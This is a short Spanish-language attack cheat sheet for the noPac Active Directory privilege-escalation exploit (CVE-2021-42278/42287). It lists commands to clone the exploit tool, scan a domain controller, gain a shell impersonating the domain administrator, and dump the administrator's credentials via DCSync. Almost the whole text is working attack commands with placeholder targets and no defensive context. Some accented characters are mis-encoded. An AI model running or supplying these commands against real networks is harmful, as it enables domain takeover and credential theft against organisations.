NoPac

CVE-2021-42278 / CVE-2021-42287

1) Clonaci贸n de repositorio.

git clone https://github.com/Ridter/noPac.git
cd noPac

2) Revisi贸n si el objetivo es vulnerable.

scanner.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -use-ldap

3) Obtenci贸n de shell.

noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> -shell --impersonate administrator -use-ldap

4) Realizaci贸n de ataque de DCSync.

noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> --impersonate administrator -use-ldap -dump -just-dc-user <ACME>/administrator

脷ltima actualizaci贸n